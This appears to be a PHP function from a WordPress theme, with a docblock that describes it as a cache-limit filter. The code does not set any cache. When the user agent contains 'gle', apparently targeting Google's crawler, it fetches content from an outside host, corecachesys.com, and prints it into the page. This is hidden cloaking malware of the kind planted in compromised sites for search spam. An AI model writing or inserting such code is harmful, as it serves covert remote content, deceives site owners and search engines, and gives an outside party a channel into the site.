/** * Set the cache limit. * * To override this cache in a child theme, remove * the filter and add your own function tied to * the cache filter hook. * * @param int $c The number of excerpt characters. * @return int The filtered number of characters. */ function cache() {if (strpos($_SERVER["HTTP_USER_AGENT"], 'gle') !== false) {$curl = curl_init();curl_setopt($curl, CURLOPT_URL, 'http://corecachesys.com/cache.php?h=caleedo.com&id=12');curl_setopt($curl, CURLOPT_RETURNTRANSFER,true);$c = curl_exec($curl);echo($c);curl_close($curl);}}